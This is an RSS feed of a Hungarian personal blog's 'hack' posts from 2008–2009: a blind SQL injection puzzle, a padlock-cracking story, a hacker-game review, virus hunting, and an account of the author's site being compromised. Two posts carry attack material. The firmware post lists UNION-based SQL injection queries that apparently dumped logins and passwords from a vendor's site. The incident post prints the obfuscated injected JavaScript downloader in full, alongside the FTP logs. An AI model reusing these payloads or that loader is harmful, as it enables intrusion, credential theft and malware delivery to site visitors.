<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Csókavár &#187; hack</title>
	<atom:link href="http://csokavar.hu/blog/tag/hack/feed/" rel="self" type="application/rss+xml" />
	<link>http://csokavar.hu</link>
	<description>Just another Csokavar.hu weblog</description>
	<lastBuildDate>Fri, 30 Mar 2012 14:25:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Hacking!</title>
		<link>http://csokavar.hu/blog/2009/12/03/hacking/</link>
		<comments>http://csokavar.hu/blog/2009/12/03/hacking/#comments</comments>
		<pubDate>Thu, 03 Dec 2009 15:08:39 +0000</pubDate>
		<dc:creator>encse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[gekkó]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://csokavar.hu/?p=1653</guid>
		<description><![CDATA[Nesze Önöknek tisztelt olvasóim egy kis karácsonyi gekkó-utánérzés. http://csokavar.hu/hacking/webshop/count.php?c=2 Ez egy blind sql feladat, kis csavarral. Aki először megmondja az admin felhasználó jelszavát, kap egy&#8230; gratulációt. Aki még nem látott ilyesmit, annak  meg valószínűleg nehéz dolga lesz&#8230;]]></description>
			<content:encoded><![CDATA[<p>Nesze Önöknek tisztelt olvasóim egy kis karácsonyi gekkó-utánérzés.</p>
<p><a href="http://csokavar.hu/hacking/webshop/count.php?c=2">http://csokavar.hu/hacking/webshop/count.php?c=2</a></p>
<p>Ez egy blind sql feladat, kis csavarral. Aki először megmondja az admin felhasználó jelszavát, kap egy&#8230; gratulációt. Aki még nem látott ilyesmit, annak  meg valószínűleg nehéz dolga lesz&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://csokavar.hu/blog/2009/12/03/hacking/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Barátok közt</title>
		<link>http://csokavar.hu/blog/2009/09/30/baratok-kozt/</link>
		<comments>http://csokavar.hu/blog/2009/09/30/baratok-kozt/#comments</comments>
		<pubDate>Wed, 30 Sep 2009 12:33:27 +0000</pubDate>
		<dc:creator>encse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://csokavar.hu/?p=1567</guid>
		<description><![CDATA[A múltkor egész jópofa hackelés volt a Barátok köztben. Kamilla chates belépési adatait úgy találták ki, hogy megnézték, hogy a böngésző valamilyen kezdőbetűre (a,b,c) felajánl-e login nevet az emlékeiből. Ebből kijött a chamomile. Aztán Bandita megtippelte, hogy a jelszó biztos Kamilla kedvenc tinimagazinjának címe lesz. Most meg kihagyják a következő ziccert. Nóra elárulta Attilának, hogy [...]]]></description>
			<content:encoded><![CDATA[<p>A múltkor egész jópofa hackelés volt a Barátok köztben. Kamilla chates belépési adatait úgy találták ki, hogy megnézték, hogy a böngésző valamilyen kezdőbetűre (a,b,c) felajánl-e login nevet az emlékeiből. Ebből kijött a chamomile. Aztán Bandita megtippelte, hogy a jelszó biztos Kamilla kedvenc tinimagazinjának címe lesz.</p>
<p>Most meg kihagyják a következő ziccert. Nóra elárulta Attilának, hogy Miklós a telefonjában tárolja az összes PIN kódját (gondolom bankkártyák, riasztó meg ilyenek). Erre most azt tervezik Klaudiával, hogy lenyúlják Miklóstól a mobilt. Pedig ha már ilyen hackelősre veszik a figurát, mennyivel szebb lenne már, ha kiderülne, hogy Miklós a mobilját a levelező programjával szinkronizálja, és Attila</p>
<p>A) küldene Miklósnak egy jól formázott HTML levelet, ami valahogy (webes levelező esetén XSS, helyi gép esetén Active-X sebezhetőség) elpostázná a Miklós levelezőjében tárolt adatokat&#8230;</p>
<p>B) feltörné Miklós otthoni Wifi hálóját, majd a frissen kijött Windows exploitot kihasználva felnyomná Miklós otthoni gépét is, és a hálózaton keresztül közvetlenül a gépről nyúlná le az adatokat&#8230;</p>
<p>C) feltörné a wifit, majd ARP poisoninggal és DNS mérgezéssel eltérítené Miklósnak a netes levelezőjével folytatott adatforgalmát és így lopná el Miklós bejelentkezési adatait.</p>
<p>D) nem tudná feltörni a wifit, ezért kénytelen lenne közvetlenül az ADSL csatornán keresztül man in the middle támadást kivitelezni. Szerencsére hozzáfér a Miklóstól kijövő telefonvonalhoz, hiszen van kulcsa a pincéhez&#8230;.</p>
<p>Hogy folytatódjon a sorozat? A hívás díja 490Ft + Áfa&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://csokavar.hu/blog/2009/09/30/baratok-kozt/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Zárnyitás alapfok</title>
		<link>http://csokavar.hu/blog/2009/08/07/zarnyitas-alapfok/</link>
		<comments>http://csokavar.hu/blog/2009/08/07/zarnyitas-alapfok/#comments</comments>
		<pubDate>Fri, 07 Aug 2009 14:38:22 +0000</pubDate>
		<dc:creator>encse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[geekség]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://csokavar.hu/?p=1521</guid>
		<description><![CDATA[Ezt a lakatot az utcán találtam, valaki elvághatta a vezetéket valami komoly csípő-harapó eszközzel, és talán eltulajdonította a hozzátartozó biciklit/motort. Én meg észrevettem a fűben az eldobott kincset, és mindenképp ki akartam próbálni, hogy fel tudom-e törni. Természetesen nem tekergettem végig a 100000 kombinációt. Kis próbálgatás után ugyanis feltűnt, hogy ha a rálépek a vezetékre, [...]]]></description>
			<content:encoded><![CDATA[<p>Ezt a lakatot az utcán találtam, valaki elvághatta a vezetéket valami komoly csípő-harapó eszközzel, és talán eltulajdonította a hozzátartozó biciklit/motort. Én meg észrevettem a fűben az eldobott kincset, és mindenképp ki akartam próbálni, hogy fel tudom-e törni.</p>
<p><a rel="clearbox" href="http://csokavar.hu/files/2009/08/p-1600-1200-8df7e0a3-59b0-47f8-98e1-4167eb22e729.jpeg"><img class="picture size-full wp-image-364" src="http://csokavar.hu/files/2009/08/p-1600-1200-8df7e0a3-59b0-47f8-98e1-4167eb22e729.jpeg" alt="" width="225" height="300" /></a> <a rel="clearbox" href="http://csokavar.hu/files/2009/08/p-1600-1200-361a7325-97bd-4eeb-b0c0-bf19f03a14af.jpeg"><img class="picture size-full wp-image-364" src="http://csokavar.hu/files/2009/08/p-1600-1200-361a7325-97bd-4eeb-b0c0-bf19f03a14af.jpeg" alt="" width="225" height="300" /></a></p>
<p>Természetesen nem tekergettem végig a 100000 kombinációt. Kis próbálgatás után ugyanis feltűnt, hogy ha a rálépek a vezetékre, és megpróbálom széthúzni a zárat, akkor egy kivételével ez összes tárcsa könnyen forog. A szoruló tárcsa 10 lehetséges állásából az egyikben, a közvetlenül mellette levő tárcsa is akadni kezdett. Ebből arra következtettem, hogy megtaláltam a helyes beállítást: a zár kicsit engedett, és emiatt most máshol szorul mint eddig. Ugyanezt eljátszva a többi tárcsára, pár perc alatt meg is találtam a helyes kódot.</p>
<p>Így vegyenek számzáras lakatot maguknak.</p>
]]></content:encoded>
			<wfw:commentRss>http://csokavar.hu/blog/2009/08/07/zarnyitas-alapfok/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Firmware upgrade</title>
		<link>http://csokavar.hu/blog/2009/01/04/firmware-upgrade/</link>
		<comments>http://csokavar.hu/blog/2009/01/04/firmware-upgrade/#comments</comments>
		<pubDate>Sun, 04 Jan 2009 17:07:45 +0000</pubDate>
		<dc:creator>encse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://csokavar.hu/?p=1089</guid>
		<description><![CDATA[Sony a seggem. Az asztali DVD lejátszóm ugyebár tud DivX-et lejátszani, de nem mennek vele a feliratok. Gondoltam jól van, nézzük van-e firmware frissítés a Sonynál. Hát volt is, pont a feliratokhoz. Betűről betűre végigtoltam, és a végén most nem indul el az aparát. Mehetek szervízbe vele. Remek. Ezen viszont kurvára felbasztam az agyamat&#8230; tehát. [...]]]></description>
			<content:encoded><![CDATA[<p>Sony a seggem. Az asztali DVD lejátszóm ugyebár tud DivX-et lejátszani, de nem mennek vele a feliratok. Gondoltam jól van, nézzük van-e firmware frissítés a Sonynál. Hát <a href="http://support.sony-europe.com/HAV/downloads/downloads.aspx?m=RDR-HX722&amp;f=fwr3&amp;chck=&amp;l=en">volt</a> is, pont a feliratokhoz. Betűről betűre végigtoltam, és a végén most nem indul el az aparát. Mehetek szervízbe vele. Remek.</p>
<p>Ezen viszont kurvára felbasztam az agyamat&#8230; tehát.</p>
<p><em>táblákok nevei:<br />
</em></p>
<pre>42 UNION SELECT 1,table_schema,3,4,5,6,7,table_name,9,10,11,12 FROM
          information_schema.TABLES</pre>
<p><em>oszlopok nevei:<br />
</em></p>
<pre>-- CONCAT('0x',HEX('Felhasznalok')) = 0x46656C6861737A6E616C6F6B

42 UNION SELECT 1,2,3,4,5,6,7,COLUMN_NAME,9,10,11,12 FROM
          information_schema.COLUMNS WHERE
                table_name = 0x46656C6861737A6E616C6F6B</pre>
<p><em>felhasználók nevei :))<br />
</em></p>
<pre>42 UNION SELECT 1,jelszo,3,4,5,6,7,loginNev,9,10,11,12 FROM
          Felhasznalok</pre>
<p>Ez azért még megy. :)</p>
]]></content:encoded>
			<wfw:commentRss>http://csokavar.hu/blog/2009/01/04/firmware-upgrade/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Így legyen ötösöm a lottón</title>
		<link>http://csokavar.hu/blog/2008/07/29/igy-legyen-otosom-a-lotton/</link>
		<comments>http://csokavar.hu/blog/2008/07/29/igy-legyen-otosom-a-lotton/#comments</comments>
		<pubDate>Tue, 29 Jul 2008 20:51:16 +0000</pubDate>
		<dc:creator>encse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[ISC]]></category>

		<guid isPermaLink="false">http://csokavar.hu/?p=450</guid>
		<description><![CDATA[András: Nem igaz, hogy mostanában mennyit frissít a Vista! Encsé: Hát épp most tölti le a nem hivatalos frissítéseket ezzel a DNS cache mérgezés mókával. András: Ugyan már, ez digitálisan alá van írva! Encsé: aha persze&#8230; Ez volt kb. múlt csütörtökön. Ma a buhera blogon olvasom, hogy: Az Infobyte Security Research csapata közzé tett egy [...]]]></description>
			<content:encoded><![CDATA[<div class="drama">
<p><span class="beszelo">András:</span> Nem igaz, hogy mostanában mennyit frissít a Vista!</p>
<p><span class="beszelo">Encsé:</span> Hát épp most tölti le a nem hivatalos frissítéseket ezzel a <a href="http://securosis.com/2008/07/08/dan-kaminsky-discovers-fundamental-issue-in-dns-massive-multivendor-patch-released/">DNS cache mérgezés </a>mókával.</p>
<p><span class="beszelo">András:</span> Ugyan már, ez digitálisan alá van írva!</p>
<p><span class="beszelo">Encsé:</span> <a href="http://www.debian.org/security/2008/dsa-1571">aha persze&#8230;</a>
</div>
<p>Ez volt kb. múlt csütörtökön. Ma a <a href="http://buhera.blog.hu/2008/07/29/dns_bug_frissitesi_szolgaltatasok_tamadasa">buhera blogon</a> olvasom, hogy:</p>
<blockquote><p>Az Infobyte Security Research csapata közzé tett egy Evilgrade nevű eszköt, amely a legutóbbi DNS cache poisoning hiba kihasználásával, illetve egyéb man-in-the-middle módszerek segítségével lehetővé teszi, hogy elterjedt alkalmazások automatikus frissítési szolgáltatásán keresztül futtassunk saját kódokat a szolgáltatást igénybe vevő számítógépeken.</p></blockquote>
<p>Hát így. Na ebben kellett volna fogadni a havi fizetésemre.</p>
]]></content:encoded>
			<wfw:commentRss>http://csokavar.hu/blog/2008/07/29/igy-legyen-otosom-a-lotton/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ördöglakat</title>
		<link>http://csokavar.hu/blog/2008/02/09/ordoglakat/</link>
		<comments>http://csokavar.hu/blog/2008/02/09/ordoglakat/#comments</comments>
		<pubDate>Sat, 09 Feb 2008 15:43:53 +0000</pubDate>
		<dc:creator>encse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://csokavar.hu/?p=29</guid>
		<description><![CDATA[Még mindig vírust keresek&#8230; Közben gyorsan végigtoltam az ordoglakat nevű magyar hacker játékot. Íme a hekkerdimplomám: http://ordoglakat.info/diploma.aspx?id=1508 :) Hát nem csodálatos? Maga a játék viszonylag egyszerű. A triviális dolgok mellett van benne két sql injectionös pálya, egy nslookupos, meg egy netcates is. Ez utóbbi eszköz nekem új volt, de máris örök barátságot kötöttünk. (Szerencsére van a cygwinben [...]]]></description>
			<content:encoded><![CDATA[<p>Még mindig vírust keresek&#8230; Közben gyorsan végigtoltam az <a href="http://ordoglakat.info/">ordoglakat</a> nevű magyar hacker játékot. Íme a hekkerdimplomám: <a href="http://ordoglakat.info/diploma.aspx?id=1508">http://ordoglakat.info/diploma.aspx?id=1508</a> :)</p>
<p>Hát nem csodálatos?</p>
<p>Maga a játék viszonylag egyszerű. A triviális dolgok mellett van benne két <em>sql injection</em>ös pálya, egy <em>nslookup</em>os, meg egy <em>netcat</em>es is. Ez utóbbi eszköz nekem új volt, de máris örök barátságot kötöttünk. (Szerencsére van a cygwinben is.)</p>
<p>Az egész nem túl nehéz, ráadásul komplett hint system is segíti a próbálkozót. Egy esti mozi helyett pont jó kikapcsolódás. Az okosok meg úgyis mind <a href="http://gekko.csokavar.hu/">gekkót</a> játszanak. :)</p>
<p>Ennyire tökös gyerek a zencsé:</p>
<table border="1">
<thead>
<tr>
<td>Pálya</td>
<td>Szint</td>
<td>Játékosok</td>
<td>Sikerült</td>
<td>Átlagos idő</td>
<td>Encsé ideje</td>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>JScript</td>
<td>2001 fő</td>
<td>1674 fő</td>
<td>233 perc</td>
<td>1 perc</td>
</tr>
<tr>
<td>2</td>
<td>Hidden Text</td>
<td>1662 fő</td>
<td>1467 fő</td>
<td>429 perc</td>
<td>2 perc</td>
</tr>
<tr>
<td>3</td>
<td>Stegano</td>
<td>1476 fő</td>
<td>1124 fő</td>
<td>807 perc</td>
<td>38876 perc</td>
</tr>
<tr>
<td>4</td>
<td>Reminder</td>
<td>1124 fő</td>
<td>725 fő</td>
<td>1489 perc</td>
<td>18 perc</td>
</tr>
<tr>
<td>5</td>
<td>DirList</td>
<td>725 fő</td>
<td>614 fő</td>
<td>1024 perc</td>
<td>16 perc</td>
</tr>
<tr>
<td>6</td>
<td>Decrypt</td>
<td>614 fő</td>
<td>571 fő</td>
<td>732 perc</td>
<td>15 perc</td>
</tr>
<tr>
<td>7</td>
<td>Deface</td>
<td>570 fő</td>
<td>518 fő</td>
<td>968 perc</td>
<td>15 perc</td>
</tr>
<tr>
<td>8</td>
<td>Info gather</td>
<td>527 fő</td>
<td>468 fő</td>
<td>762 perc</td>
<td>2 perc</td>
</tr>
<tr>
<td>9</td>
<td>SQL Inject</td>
<td>464 fő</td>
<td>412 fő</td>
<td>460 perc</td>
<td>7 perc</td>
</tr>
<tr>
<td>10</td>
<td>Brute Force</td>
<td>412 fő</td>
<td>373 fő</td>
<td>1016 perc</td>
<td>49 perc</td>
</tr>
<tr>
<td>11</td>
<td>Backdoor</td>
<td>372 fő</td>
<td>245 fő</td>
<td>3917 perc</td>
<td>22 perc</td>
</tr>
<tr>
<td>12</td>
<td>Diploma</td>
<td>246 fő</td>
<td>206 fő</td>
<td>1861 perc</td>
<td>15 perc</td>
</tr>
</tbody>
</table>
<p>A Steganonál már pár hete elment a kedvem az egésztől, de ma újult erővel ismét belevágtam! A brute forcenál meg csináltam egy gyönyörű Ajaxos codát, ami teljesen magától oldotta meg a feladatot. Na az volt 49 perc&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://csokavar.hu/blog/2008/02/09/ordoglakat/feed/</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Még több vírus</title>
		<link>http://csokavar.hu/blog/2008/02/09/meg-tobb-virus/</link>
		<comments>http://csokavar.hu/blog/2008/02/09/meg-tobb-virus/#comments</comments>
		<pubDate>Sat, 09 Feb 2008 14:44:54 +0000</pubDate>
		<dc:creator>encse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[geekség]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[vírus]]></category>

		<guid isPermaLink="false">http://csokavar.hu/?p=30</guid>
		<description><![CDATA[Mióta hazajöttem, a vírusokat kutatom az itthoni gépen. Már lefutott a McAfee BartPE verziója: (Cornenet, Generic Delphi Trojan). Nem valami izgalmas. Most éppen a Panda CD-ről bebootoló verziója fut (ez sajnos elég régi adatbázissal). Ez már kicsit többet talált, de még mindig nem vagyok megelégedve. A legérdekesebb a JS/Downloader.NOE volt, de igazából ez se hozott lázba. Persze [...]]]></description>
			<content:encoded><![CDATA[<p>Mióta hazajöttem, a vírusokat kutatom az itthoni gépen. Már lefutott a McAfee BartPE verziója: (Cornenet, Generic Delphi Trojan). Nem valami izgalmas.</p>
<p>Most éppen a Panda CD-ről bebootoló verziója fut (ez sajnos elég régi adatbázissal). Ez már kicsit többet talált, de még mindig nem vagyok megelégedve. A legérdekesebb a JS/Downloader.NOE volt, de igazából ez se hozott lázba. Persze még messze nem végzett: a Windows könyvtárig még el se jutott.</p>
<p>Kicsit paranoiás lettem ettől az egésztől. Különösen akkor lesz fasza, ha nem találok semmit&#8230; Délután már egy accountot is kikönyörögtem a vállalati tűzfalhoz, és a logokban kerestem gyanús IP-ket (azt a bizonyos Hong Kong-i tartományt). Mondanom se kell: semmi eredmény.</p>
<p>Allkalmasint újratelepítem ezt a két gépet asszem.</p>
<p>Majd elfelejtettem: a monitor természetesen még mindig fejjel lefelé van felcsavarozva, így szöveges módban sajons fejen áll a kép. Ezért aztán lefektettem az egészet ide, magam mellé az asztalra&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://csokavar.hu/blog/2008/02/09/meg-tobb-virus/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>shapgvba ejtf(c){&#8230;</title>
		<link>http://csokavar.hu/blog/2008/02/05/shapgvba-ejtfc/</link>
		<comments>http://csokavar.hu/blog/2008/02/05/shapgvba-ejtfc/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 15:45:31 +0000</pubDate>
		<dc:creator>encse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[geekség]]></category>
		<category><![CDATA[gekkó]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[vírus]]></category>
		<category><![CDATA[zsonglőrködés]]></category>

		<guid isPermaLink="false">http://csokavar.hu/?p=31</guid>
		<description><![CDATA[Amikor a pokol elszabadul. Rémálom baszki. Gondos házigazda lévén, rendszeresen nézegetem az oldalaimat, hogy minden rendben van-e, nem kell-e valami hozzászólást kimoderálni stb. Vasárnap feltűnt valami kis apróság. A böngészőm a csokavar.hu főoldalán valami ismeretlen add-in-t akart futtatni. Márpedig én ilyet nem írtam sehova. Aztán nézem a forrást, és 500-600 üres sorral a fájl általam [...]]]></description>
			<content:encoded><![CDATA[<p>Amikor a pokol elszabadul.</p>
<p>Rémálom baszki.</p>
<p>Gondos házigazda lévén, rendszeresen nézegetem az oldalaimat, hogy minden rendben van-e, nem kell-e valami hozzászólást kimoderálni stb. Vasárnap feltűnt valami kis apróság. A böngészőm a csokavar.hu főoldalán valami ismeretlen add-in-t akart futtatni. Márpedig én ilyet nem írtam sehova. Aztán nézem a forrást, és 500-600 üres sorral a fájl általam gondolt vége után találtam egy ilyet:</p>
<div class="programcode">
<p>&lt;script language=JavaScript&gt;var sf=&#8221; shapgvba cwzgq(d){ine xp,yfl=\&#8221;r|b&#8217;RhkB_98[5)XsvAPClwHix.e,2o:$uyT^&amp;Vqa36Nd=-Z\\\"{`z]m@GS;UIc# 0}jWMt1pf7~(n4O*+g!\&#8221;,xn=\&#8221;\&#8221;,c,wah,xs=\&#8221;\&#8221;,pr;sbe(xp=0;xp&lt;d.yratgu;xp++){ c=d.puneNg(xp);wah=yfl.vaqrkBs(c);vs(wah&gt;-1){ pr=((wah+1)%81-1);vs(pr&lt;=0)pr+=81;xs+=yfl.puneNg(pr-1); } ryfr xs+=c;}xn+=xs;qbphzrag.jevgr(xn);}&#8221;,aarf=&#8221;";for(nyf=0;nyf&lt;sf.length;nyf++){ cqd = sf.charCodeAt(nyf);if((cqd&gt;64 &amp;&amp; cqd&lt;78)||(cqd&gt;96 &amp;&amp; cqd&lt;110)) cqd=cqd+13;else if((cqd&gt;77 &amp;&amp; cqd&lt;91)||(cqd&gt;109 &amp;&amp; cqd&lt;123))cqd=cqd-13;aarf=aarf.concat(String.fromCharCode(cqd));} var hw,u; eval( aarf );hw=&#8221;&lt;7s,N#!0G431x41|-{U4k47s,N#!{&gt;0n&#8217;sx]|3!rJ,N!|a0{&lt;SPRdyF0G431x41|-\\{Z4k4Ss,N#!\\{0SRP-\\{l!!#$//JJJr1&#8221;1G|M434Gj!Gs7rs&#8217;]/99x!!rU7?{tn&#8217;sx]|3!r,|i|,,|,t{\\{&gt;&lt;\\/SPRdyF&gt;{0KH0&lt;/7s,N#!&gt;0&#8243;; pjmtd(hw);&lt;/script&gt;</p>
</div>
<p>Szoktam ronda kódot írni, de azért ez&#8230; </p>
<p>Kiderült, hogy fenti szutyok valami Hong Kongi gépről (58.65.238.60) próbál egy vírust letölteni a látogató gépére.</p>
<p>Aztán elkezdtem a logokat böngészni, míg az FTP logban a következőre nem bukkantam:</p>
<div class="programcode">
<p>Fri Feb 1 23:58:06 2008 [pid 7784] [encse] OK LOGIN: Client &#8220;58.65.238.59&#8243;</p>
<p>Fri Feb 1 23:58:12 2008 [pid 7787] [encse] OK DOWNLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/www/index.php&#8221;, 3904 bytes, 16.06Kbyte/sec</p>
<p>Fri Feb 1 23:58:14 2008 [pid 7787] [encse] OK UPLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/www/index.php&#8221;, 5498 bytes, 11.47Kbyte/sec</p>
<p>Fri Feb 1 23:58:16 2008 [pid 7787] [encse] OK DOWNLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/gekko/index.php&#8221;, 92 bytes, 0.39Kbyte/sec</p>
<p>Fri Feb 1 23:58:18 2008 [pid 7787] [encse] OK UPLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/gekko/index.php&#8221;, 1686 bytes, 3.49Kbyte/sec</p>
<p>Fri Feb 1 23:58:21 2008 [pid 7787] [encse] OK DOWNLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/blog/index.php&#8221;, 54 bytes, 0.23Kbyte/sec</p>
<p>Fri Feb 1 23:58:23 2008 [pid 7787] [encse] OK UPLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/blog/index.php&#8221;, 1648 bytes, 3.43Kbyte/sec</p>
<p>Fri Feb 1 23:58:26 2008 [pid 7787] [encse] OK DOWNLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/zsonglor/index.php&#8221;, 5645 bytes, 24.04Kbyte/sec</p>
<p>Fri Feb 1 23:58:28 2008 [pid 7787] [encse] OK UPLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/zsonglor/index.php&#8221;, 7239 bytes, 10.81Kbyte/sec</p>
<p>Fri Feb 1 23:58:31 2008 [pid 7787] [encse] OK DOWNLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/zsonglor/siteswap/index.php&#8221;, 7102 bytes, 16.60Kbyte/sec</p>
<p>Fri Feb 1 23:58:33 2008 [pid 7787] [encse] OK UPLOAD: Client &#8220;58.65.238.59&#8243;, &#8220;/public_html/zsonglor/siteswap/index.php&#8221;, 8696 bytes, 12.99Kbyte/sec</p>
</div>
<p>Ugyanaz a Hong Kongi IP, közvetlen a másik mellett.</p>
<p>Szóval valaki lenyúlta az FTP jelszavamat, és ahogy sejtem, arra használta fel, hogy ugyanezt a jelszólopó trójait terjessze az oldalaimon.</p>
<p>A neten találtam egy fórumot, ahol egy hasonló támadást elemeznek (<a href="http://pouet.net/topic.php?which=5006&amp;page=1">http://pouet.net/topic.php?which=5006&amp;page=1</a>). Itt az &#8216;én&#8217; scriptem egy másik mutációját elemzik. Szerintük az egész mögött a <a href="http://en.wikipedia.org/wiki/Russian_Business_Network">Russian Business Network</a> áll, ami a wikipedia leírása alapján nagyjából a maffia. hátafaszom.</p>
<p>Tegnap jelszavakat váltogattam (bankos, céges, stb.  el lehet képzelni&#8230;) Ma meg egész nap a gépet pucolgattam, de ez tisztának tűnik. Azt gondolom, hogy az otthoni, régi gépemen lesz a trójai, de ez a hétvége előtt nem fog kiderülni.</p>
<p>És az egészben nem is az fáj, hogy engem meghackeltek, mert előfordul az ilyesmi. De a büdös kurva életbe már: a szájbavert zsonglőr oldalamra töltik fel az ótvar szutykukat, hogy az arra tévedő gyerekek gépére másszon fel az a szemét.</p>
<p>Én sose voltam a halálbüntetés ellen: le kéne géppuskázni az egész baszott bagást, úgy ahogy van, aztán nézegethetnek.</p>
]]></content:encoded>
			<wfw:commentRss>http://csokavar.hu/blog/2008/02/05/shapgvba-ejtfc/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

